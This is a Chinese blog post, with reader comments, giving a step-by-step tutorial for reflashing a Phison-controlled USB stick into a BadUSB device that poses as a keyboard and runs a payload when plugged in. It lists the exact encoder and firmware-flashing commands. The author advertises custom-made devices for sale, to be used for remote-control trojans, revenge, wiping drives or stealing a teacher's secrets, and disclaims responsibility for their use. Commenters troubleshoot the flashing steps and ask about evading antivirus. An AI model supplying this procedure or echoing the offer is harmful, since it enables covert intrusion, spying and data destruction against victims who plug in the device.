利用U盘制作简单BadUSB,插谁谁怀孕,价格便宜,人人都可以拥有

2016-4-1 / 28 评论 技术文章 / Mrxn

本文共计 1654 字,感谢您的耐心浏览与评论.

首先 来看一下 图(如果刷坏或者想更改Payload,需要短接39和40针,再用官方刷写工具刷新),注意红色箭头标志:

点击查看原图


0x00 前言 

关于Badusb可以参看这个视屏:http://v.qq.com/boke/page/l/g/w/l01425u2igw.html

不是很新的东西,其他作者已对此做过研究测试,本文仅用来记录操作过程,保存日志,说明细节。

0x01参考资料 

https://github.com/adamcaudill/Psychson 
https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads 
http://zone.wooyun.org/content/20001 

0x02环境搭建 

1、硬件 

U盘 :东芝(TOSHIBA) 速闪系列 U盘 16GB (黑色) USB3.0 主控版本:Phison 2251-03 购买地址: http://item.jd.com/929732.html

2、软件 

Windows x64主机 

(1)Java Runtime Environment :Java环境,用于支持Duckencoder 

(2)SDCC :刷写U盘的环境,用于支持Psychson 

(3)Visual Studio 2012 :编译Psychson的开发环境 

(4)Psychson :BasUSB写入工具 (https://github.com/adamcaudill/Psychson)

(5)Burner File :BN03V104M.BIN,必要的burner 

(6)USB-Rubber-Ducky Payload :编写Payload的参考代码 (https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads)

(7)Duckencoder :用于编译Payload 

(8)chipgenius 芯片检测工具 :用于确定U盘型号 

0x03操作流程 

1、配置Payload 

进入DuckEncoder文件夹 

执行:

java -jar encoder.jar -i payload.txt -o inject.bin

说明: 

encoder.jar:文件夹自带 
payload.txt:可参考USB-Rubber-Ducky Payload 
inject.bin:执行代码后生成的文件 

2、生成固件 

执行:

Psychson-master\firmware\build.bat

生成fw.bin文件 

3、将Payload写入fw.bin文件 

执行:

EmbedPayload.exe inject.bin fw.bin

说明: 

EmbedPayload.exe:编译EmbedPayload工程得来 
inject.bin:操作1生成 
fw.bin:操作2生成 

4、将生成的固件写入U盘 

(1)执行

DriveCom.exe /drive=E /action=SetBootMode

设置U盘模式 

(2)执行

DriveCom.exe /drive=E /action=SendExecutable /burner=BN03V104M.BIN

操作burner 

(3)执行

DriveCom.exe /drive=E /action=SendFirmware /burner=BN03V104M.BIN /firmware=fw.bin

将fw.bin刷入U盘 

0x04 小结 

刷入成功后,下次插入U盘会模拟键盘操作,自动执行Payload 

0x05 补充 

如果刷坏或者想更改Payload,需要短接39和40针,再用官方刷写工具刷新 

相关工具以及国外的工具资料包请在这里下载:00.png

链接: http://pan.baidu.com/s/1jIm22bk 密码: mrxn

欢迎私聊博主个人定制哦!价格实惠,保你满意,远控女神?试卷?老师的秘密?报复?格盘?改后缀?木马?都可以!哈哈

我只负责制作,怎么用那是你的事儿!你也可以自己按照教程制作,喜欢折腾的慢慢折腾去吧!


标签: 攻击 渗透测试 隐私窃取 黑客工具 分享 badusb

转载:转载请注明原文链接 - 利用U盘制作简单BadUSB,插谁谁怀孕,价格便宜,人人都可以拥有


28条回应:“利用U盘制作简单BadUSB,插谁谁怀孕,价格便宜,人人都可以拥有”

  1. fa

    C:\Users\lulu\Desktop\badusb\badusb\general>DriveCom.exe /drive=G /action=SendFirmware /burner=BN07V103M.BIN /firmware=fw2.bin
    Action specified: SendFirmware
    Gathering information...
    Reported chip type: 2307
    Reported chip ID: 98-3A-98-A3-76-51
    Reported firmware version: 1.03.10
    Mode: Burner
    Rebooting...
    Sending firmware...
    FATAL: System.InvalidOperationException: Header not accepted
       在 DriveCom.PhisonDevice.TransferFile(Byte[] data, Byte header, Byte body)
       在 DriveCom.Startup._RunFirmware(String fileName)
       在 DriveCom.Startup._SendFirmware()
       在 DriveCom.Startup.Main(String[] args)


    楼主写入是出错 不知啥意思

  2. 小斌

    博主,我在
    执行:
    Psychson-master\firmware\build.bat
    生成fw.bin文件
    这一步出错了

    rmware\build.bat
    *** Building main.c...
    at 1: error 4: 'fopen' failed on file 'main.c'
    *** There were errors! ***
    *** Done.

    提示这个,这个怎么搞?

  3. 小斌

    博主你好,我到有一步进行不下去了,
    C:\Users\Administrator>E:\1\firmware\build.bat
    *** Building main.c...
    at 1: error 4: 'fopen' failed on file 'main.c'
    *** There were errors! ***
    *** Done.
    打开这个文件,sdcc也好了vs2012也好了,就是生成不了fw.bin文件,求助啊

  4. 666

    楼主,多少钱一个

  5. 博主大哥,可以共享一下那个量产升级工具吗,现在想改payload

  6. T

    Action specified: SendExecutable
    FATAL: System.InvalidOperationException: DeviceIoControl failed: 0006
       在 DriveCom.PhisonDevice._SendCommand(SafeFileHandle handle, Byte[] cmd, Byte
    [] data, Int32 bytesExpected)
       在 DriveCom.PhisonDevice.SendCommand(Byte[] cmd, Byte[] data)
       在 DriveCom.PhisonDevice.TransferFile(Byte[] data, Byte header, Byte body)
       在 DriveCom.PhisonDevice.TransferFile(Byte[] data)
       在 DriveCom.Startup._ExecuteImage(String fileName)
       在 DriveCom.Startup.Main(String[] args)
    BURNER这一步报错   求解

  7. T

    这个payload怎么写啊  求简单介绍下

      • Mrxn

        @T:freebuf 上面多的是 各种姿势 实在不会 就Google 一大堆呀 自己看别人的 在修改就可以了啊

  8. 大神,收我为徒吧,个人就会C语言,大学学的电子信息,电子方面还行,我买了2个U盘主控都是2307报错,是不是没法补救了,必须是2303吗

  9. 博主啊,我都买回2个2307 了,2307最后一步报错啊

  10. 还有就是我下载了远控后,会不会被杀毒干掉

1 2

发表评论

{view_code_no}